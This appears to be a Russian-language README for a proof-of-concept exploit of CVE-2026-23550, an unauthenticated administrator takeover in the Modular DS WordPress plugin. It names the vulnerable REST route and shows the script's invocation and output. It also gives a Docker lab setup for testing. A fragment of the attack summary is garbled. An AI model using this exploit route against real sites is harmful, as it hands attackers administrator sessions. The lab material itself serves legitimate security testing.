
CVE-2026-23550 — плагин Modular DS для WordPress **Неавторизованный доступ администратора**
Proof-of-Concept (PoC), демонстрирующий CVE-2026-23550 — критическую уязвимость неавторизованного захвата учётной записи администратора в плагине Modular DS для WordPress (версии ≤2.5.1). Активно эксплуатируется в дикой природе.

Краткое описание атаки: Ошибочная маршрутизация REST API в /api/modular-connector/login обходит аутентификацию WordPress при , выдавая неавторизованные сессионные cookie администратора.
origin=mo# PoC, готовый к продакшену
./CVE-2026-23550-PoC.sh http://target.com
[+] CVE-2026-23550 Modular Connector Exploit Test
[+] VULNERABLE: Admin session cookie issued
Затронутая REST-конечная точка доступна исключительно через механизм ?rest_route=; прямой доступ через /wp-json/ может быть недоступен. Уязвимость позволяет неавторизованный доступ без учётных данных или проверки nonce. Успешная выдача сессионной cookie администратора WordPress подтверждает факт эксплуатации. Данный proof-of-concept не выполняет никаких административных действий. При тестировании используется Modular DS версии 2.5.0.
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp
version: "3.9"
services:
db:
image: mysql:8.0
restart: always
environment:
MYSQL_ROOT_PASSWORD: rootpass
MYSQL_DATABASE: wordpress
MYSQL_USER: wpuser
MYSQL_PASSWORD: wppass
volumes:
- db_data:/var/lib/mysql
wordpress:
image: wordpress:6.4.3-php8.2-apache
depends_on:
- db
ports:
- "8080:80"
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: wpuser
WORDPRESS_DB_PASSWORD: wppass
WORDPRESS_DB_NAME: wordpress
volumes:
- wp_data:/var/www/html
volumes:
db_data:
wp_data:
docker compose up -d
docker compose logs -f db
Дождитесь сообщения: "ready for connections"
curl http://localhost:8080/?rest_route=/
Ожидаемый результат:
{
"name": "...",
"namespaces": [...]
}
Если это не работает → ОСТАНОВИТЕСЬ, окружение неисправно.
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip
WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/
docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
/var/www/html/wp-content/plugins/modular-connector
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/
Примечание: Если вы хотите сохранить cookie в текстовый файл, удалите "rm -f "$COOKIE_JAR"" из файла poc.sh.
Лицензия MIT - Только для исследований в области безопасности и авторизованного пентестинга. Не для злонамеренного использования. Раскрывайте информацию ответственно.
Данный PoC предназначен только для авторизованного тестирования безопасности. Несанкционированное использование против производственных систем незаконно. Сообщайте о находках разработчикам плагина.